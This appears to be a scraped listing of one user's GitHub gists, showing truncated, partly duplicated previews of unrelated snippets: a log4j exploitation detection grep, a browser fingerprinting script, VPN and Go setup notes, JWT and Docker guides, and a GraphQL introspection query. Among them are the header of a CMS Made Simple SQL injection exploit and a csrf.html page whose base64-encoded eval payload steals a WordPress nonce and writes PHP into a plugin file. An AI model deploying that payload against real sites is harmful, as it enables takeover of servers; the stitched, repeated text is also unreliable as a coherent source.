r0hack r0hack

## log4j_rce_detection.md

      
              1 file
            
          
              72 forks
            
          
              70 comments
            
          
              512 stars
            
          
                Neo23x0
                / log4j_rce_detection.md
            
            
              Last active
              January 28, 2024 08:19
            
              
                Log4j RCE CVE-2021-44228 Exploitation Detection
              
          
    log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

  
## fingerprint.js
(() => {
  let gadgets = [];

  if (typeof _satellite !== 'undefined') {
    gadgets.push('Adobe Dynamic Tag Management');
  }

  if (typeof BOOMR !== 'undefined') {
    gadgets.push('Akamai Boomerang');
  }

## GlobalProtect-Portal-Linux.readme
# Guide setup GlobalProtect Portal on Linux

## Setup GlobalProtect

sudo apt update

Download GlobalProtect: https://github.com/jundat95/GlobalProtectVPN/raw/master/PanGPLinux-5.0.8-c6.tgz

Go to folder Downloads and Unzip: tar -xvzf PanGPLinux-5.0.8-c6.tgz

## gist:6ebac2290a6fb33eea1af194485a22b1
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

## csrf.html
<html>
  <body>
    <form action="http://wpxss.vh/wp-comments-post.php" method="POST">
      <input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld

## update-golang.md

      
              1 file
            
          
              113 forks
            
          
              174 comments
            
          
              613 stars
            
          
                nikhita
                / update-golang.md
            
            
              Last active
              April 27, 2024 13:09
            
              
                How to update the Go version
              
          
    How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.
1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.
To uninstall, delete the /usr/local/go directory by:

  
## tokens.md

      
              1 file
            
          
              554 forks
            
          
              175 comments
            
          
              2461 stars
            
          
                zmts
                / tokens.md
            
            
              Last active
              May 6, 2024 20:13
            
              
                Про токены, JSON Web Tokens (JWT), аутентификацию и авторизацию. Token-Based Authentication
              
          
    Про токены, JSON Web Tokens (JWT), аутентификацию и авторизацию. Token-Based Authentication

Last major update: 25.08.2020

Что такое авторизация/аутентификация
Где хранить токены
Как ставить куки ?
Процесс логина
Процесс рефреш токенов
Кража токенов/Механизм контроля токенов


## docker-cheat-sheat.md

      
              1 file
            
          
              55 forks
            
          
              2 comments
            
          
              182 stars
            
          
                dwilkie
                / docker-cheat-sheat.md
            
            
              Last active
              January 18, 2024 10:56
            
              
                Docker Cheat Sheet
              
          
    Build docker image

$ cd /path/to/Dockerfile
$ sudo docker build .

View running processes


## introspection-query.graphql

  query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {

## curl.md

      
              5 files
            
          
              995 forks
            
          
              100 comments
            
          
              3951 stars
            
          
                subfuzion
                / curl.md
            
            
              Last active
              May 6, 2024 09:53
            
              
                curl POST examples
              
          
    Common Options

-#, --progress-bar
Make curl display a simple progress bar instead of the more informational standard meter.
-b, --cookie <name=data>
Supply cookie with request. If no =, then specifies the cookie file to use (see -c).
-c, --cookie-jar <file name>
File to save response cookies to.
	(() => {
	let gadgets = [];

	if (typeof _satellite !== 'undefined') {
	gadgets.push('Adobe Dynamic Tag Management');
	}

	if (typeof BOOMR !== 'undefined') {
	gadgets.push('Akamai Boomerang');
	}
	# Guide setup GlobalProtect Portal on Linux

	## Setup GlobalProtect

	sudo apt update

	Download GlobalProtect: https://github.com/jundat95/GlobalProtectVPN/raw/master/PanGPLinux-5.0.8-c6.tgz

	Go to folder Downloads and Unzip: tar -xvzf PanGPLinux-5.0.8-c6.tgz
	#!/usr/bin/env python
	# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
	# Date: 30-03-2019
	# Exploit Author: Daniele Scanu @ Certimeter Group
	# Vendor Homepage: https://www.cmsmadesimple.org/
	# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
	# Version: <= 2.2.9
	# Tested on: Ubuntu 18.04 LTS
	# CVE : CVE-2019-9053
	<html>
	<body>
	<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
	<input type="text" name="comment" value="<a title='xss" style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob("dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld

	query IntrospectionQuery {
	__schema {
	queryType { name }
	mutationType { name }
	subscriptionType { name }
	types {
	...FullType
	}
	directives {